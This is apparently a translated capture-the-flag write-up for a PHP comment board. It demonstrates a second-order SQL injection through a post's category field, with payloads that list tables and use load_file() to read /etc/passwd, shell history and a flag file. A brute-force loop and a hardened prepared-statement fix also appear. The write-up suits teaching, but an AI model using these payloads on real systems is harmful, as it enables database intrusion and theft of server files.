mysql.php
Visiting it does not seem to achieve anything for now; come back to it later. The session value must equal yes before login.php can be used.
A hint is given, so the three-character suffix can simply be enumerated:
    str_a = '123456789abcdefghijklmnopqrstuvwxzy'
    for i in str_a:
        for j in str_a:
            for k in str_a:
                print(i + j + k)
The password turns out to be zhangwei666.
do_login.php
The recovered source is incomplete; here is the fragment from a more experienced player's write-up:
    ...0) {
        $category = mysql_fetch_array($result)['category'];
        $content = addslashes($_POST['content']);
        $sql = "insert into comment set category = '$category', content = '$content', bo_id = '$bo_id'";
        $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
    default:
        header("Location: ./index.php");
    }
    } else {
        header("Location: ./index.php");
    }
    ?>
Copyright notice: this article is an original post by CSDN blogger "HyyMbb", released under the CC 4.0 BY-SA license; reproductions must include the original link and this notice.
Original link: https://blog.csdn.net/a3320315/article/details/104216070
The two inputs that matter are category, where the injection statement is written, and the content field of the comment form. The category value is read straight back out of the database with no filtering at all (nothing like the addslashes($_POST['category']) treatment), so this is where to concentrate. Only content is escaped before the query is built:
    $content = addslashes($_POST['content']);
    $sql = "insert into comment set category = '$category', content = '$content', bo_id = '$bo_id'";
When creating the post, fill in:
    TITLE: database
    CATEGORY: 123',content=database(),/*
    CONTENT: 123
and then submit */# in the comment box. The server builds:
    $content = addslashes($_POST['content']);
    $sql = "insert into comment set category = '123',content=database(),/*', content = '*/#', bo_id = '$bo_id'";
Everything between /* and */ is a comment and # discards the rest of the line, so content=database() is what actually executes.
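The underlying bug is a second-order injection: addslashes() only protects the statement it is applied to, and MySQL drops the backslashes when it stores the value, so whatever is later read back from the database is the raw input again. The following is an added example, not the challenge's code, that puts the vulnerable pattern from the do_login.php fragment beside a hardened version using mysqli prepared statements. The mysqli connection $conn, the board table with columns id and category, and the comment table with columns category, content and bo_id are assumed from the fragment; get_result() assumes the mysqlnd driver.

```php
<?php
// Added example, not the challenge's own code. Assumes a mysqli
// connection $conn, a board table with columns id and category, and
// a comment table with columns category, content and bo_id (names
// taken from the leaked fragment; everything else is assumed).

// --- Vulnerable pattern (mirrors the do_login.php fragment) ---
// addslashes() on the original POST only protected the INSERT into
// board. MySQL strips the backslashes when storing, so the category
// read back here is the raw input again, and it is concatenated into
// a second statement without any escaping.
function add_comment_vulnerable(mysqli $conn, string $bo_id, string $content): bool
{
    $bo_id_esc = $conn->real_escape_string($bo_id);
    $result    = $conn->query("select category from board where id = '$bo_id_esc'");
    $row       = $result->fetch_assoc();
    if ($row === null) {
        return false;                         // no such post
    }
    $category = $row['category'];             // trusted only because it came from the DB
    $content  = addslashes($content);         // only this value is escaped
    $sql = "insert into comment set category = '$category', content = '$content', bo_id = '$bo_id_esc'";
    return (bool) $conn->query($sql);
}

// --- Hardened pattern ---
// Every value is bound as a parameter, including the one fetched from
// the database, so its origin no longer matters and addslashes() is
// not used at all. Data never becomes part of the SQL text.
function add_comment_hardened(mysqli $conn, int $bo_id, string $content): bool
{
    $sel = $conn->prepare("select category from board where id = ?");
    $sel->bind_param("i", $bo_id);
    $sel->execute();
    $row = $sel->get_result()->fetch_assoc();  // requires mysqlnd
    $sel->close();
    if ($row === null) {
        return false;                         // no such post
    }
    $category = $row['category'];

    $ins = $conn->prepare("insert into comment set category = ?, content = ?, bo_id = ?");
    $ins->bind_param("ssi", $category, $content, $bo_id);
    $ok = $ins->execute();
    $ins->close();
    return $ok;
}
```

With the hardened version a stored category such as 123',content=database(),/* is inserted verbatim as a string, and the comment-sequence trick has nothing to act on; the fix is to bind every value, not to escape more inputs, because escaping is lost at the first round trip through the database.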
The same trick lists the tables:
    123',content=(select group_concat(table_name) from information_schema.tables where table_schema=database()),/*
which returns board,comment,user.
load_file() works here too:
    123',content=(select (load_file('/etc/passwd'))),/*
which produces the query
    insert into comment set category = '123',content=(select (load_file('/etc/passwd'))),/*', content = '*/#', bo_id = '$bo_id'";
Reading the shell history, and then a hex dump of /tmp/html/.DS_Store:
    123',content=(select (load_file('/home/www/.bash_history'))),/*
    123', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
reveals the file name flag_8946e1ff1ee3e40f.php, which can be read the same way:
    123',content=(select (load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*